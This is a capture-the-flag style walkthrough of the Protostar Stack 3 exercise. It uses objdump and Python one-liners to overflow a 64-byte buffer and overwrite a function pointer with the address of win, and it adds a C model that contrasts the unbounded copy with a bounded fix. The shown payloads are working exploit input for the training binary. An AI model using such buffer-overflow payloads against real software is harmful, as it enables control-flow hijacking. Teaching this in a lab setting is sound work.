Exploit-Exercises Protostar Stack 3
Stack 3: https://exploit-exercises.com/protostar/stack3/
Exploit-Exercises Machines: https://exploit-exercises.com/download/
This stack exercise builds on the previous ones and looks at changing the target address of a jump in order to change the flow of the program.
First let’s look at the source code.
Ok, this looks a bit different from before: there's no variable we have to write to, just a function which is never called and a function pointer (fp) which is called but never assigned a target.
What this is trying to emulate is overwriting EIP to call a different function, except that this time, instead of EIP, we have a variable to overwrite.
First we'll need to find out the address of the win function in memory; fortunately objdump shows this pretty clearly.
user@protostar:/opt/protostar/bin$ objdump -x stack3 | grep win
08048424 g F .text 00000014 win
user@protostar:/opt/protostar/bin$
The -x option makes objdump print all of the file's headers, including the symbol table, so every function's address is listed; searching for win gives us the win function's address, 0x08048424.
So now we know where to go; we just need to know how much we have to write to reach the fp variable. We can pretty much guess that it sits immediately after our 64-byte buffer, but we'll check with Python.
user@protostar:/opt/protostar/bin$ (python -c "print 'a'*65";) | ./stack3
calling function pointer, jumping to 0x00000061
Segmentation fault
user@protostar:/opt/protostar/bin$
As expected, the 65th 'a' overwrote the low byte of the fp variable (0x61 is ASCII 'a'). We now need 64 'a's followed by the address of win in little-endian byte order, and we should be able to change the execution of the program. Let's try it.
user@protostar:/opt/protostar/bin$ (python -c "print 'a'*64 + '\x24\x84\x04\x08'";) | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
user@protostar:/opt/protostar/bin$
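To show the same defect and its fix from the defender's side, here is an added C model. It is not the exercise's own source (which this page does not reproduce): a struct with a 64-byte buffer immediately followed by a 4-byte integer standing in for fp (that layout is an assumption, chosen because it matches the 65th-byte result above), a gets()-style unbounded copy, and a bounded replacement that rejects any line that does not fit. The two constructed inputs are the ones typed in the session above; fp is an integer here, so nothing is ever called through it.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the Protostar source. Assumed layout: a 64-byte buffer
 * immediately followed by the 4-byte function pointer, modelled as uint32_t
 * so the example never calls through a corrupted pointer. */
#define BUF_SIZE 64

struct frame {
    char     buffer[BUF_SIZE];
    uint32_t fp;   /* stands in for the 32-bit function pointer variable */
};

/* The gets() pattern: the copy is bounded by the line, not by the buffer, so
 * bytes 65..68 of the line land in fp. The copy is capped at the frame size
 * only so this model does not corrupt its own host; the real gets() keeps
 * writing past fp. Returns the value fp holds afterwards. */
uint32_t unsafe_fill(const char *line)
{
    struct frame f;
    size_t len = strlen(line);

    memset(&f, 0, sizeof f);            /* fp starts at 0, as in the exercise */
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, line, len);              /* BUG: no relation to BUF_SIZE */
    return f.fp;
}

/* Hardened reader: the line must fit in the buffer including its terminator,
 * otherwise nothing is written and -1 is returned. fp can then only be
 * changed by the program itself. Returns 0 on success. */
int safe_fill(const char *line, struct frame *f)
{
    size_t len = strlen(line);

    memset(f, 0, sizeof *f);
    if (len >= BUF_SIZE)
        return -1;
    memcpy(f->buffer, line, len + 1);   /* copies the NUL as well */
    return 0;
}

/* Constructed inputs mirroring the walkthrough's two payloads. */
static void fill_a(char *out, size_t n)
{
    memset(out, 'a', n);
    out[n] = '\0';
}

uint32_t fp_after_n_a(size_t n)         /* n up to 79 */
{
    char line[80];
    fill_a(line, n);
    return unsafe_fill(line);
}

uint32_t fp_after_addr_payload(void)    /* 64 x 'a' + 0x08048424 little-endian */
{
    char line[80];
    fill_a(line, 64);
    memcpy(line + 64, "\x24\x84\x04\x08", 5);   /* 4 address bytes + NUL */
    return unsafe_fill(line);
}

int safe_fill_n_a(size_t n)             /* result of the hardened reader */
{
    struct frame f;
    char line[80];
    fill_a(line, n);
    return safe_fill(line, &f);
}

int main(void)
{
    printf("unsafe, 64 x 'a':        fp = 0x%08" PRIx32 "\n", fp_after_n_a(64));
    printf("unsafe, 65 x 'a':        fp = 0x%08" PRIx32 "\n", fp_after_n_a(65));
    printf("unsafe, 64 x 'a' + addr: fp = 0x%08" PRIx32 "\n", fp_after_addr_payload());
    printf("safe,   65 x 'a':        %s\n", safe_fill_n_a(65) ? "rejected" : "accepted");
    printf("safe,   63 x 'a':        %s\n", safe_fill_n_a(63) ? "rejected" : "accepted");
    return 0;
}
```

On a little-endian host (x86, as the Protostar VM is) the unsafe values printed match the "jumping to" lines above: 0x00000061 for the 65th 'a' and 0x08048424 for the address payload, while the bounded reader rejects both oversized lines and leaves fp untouched.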
And that's all there is to it. The next challenge looks at what to do when there isn't a convenient function pointer being called.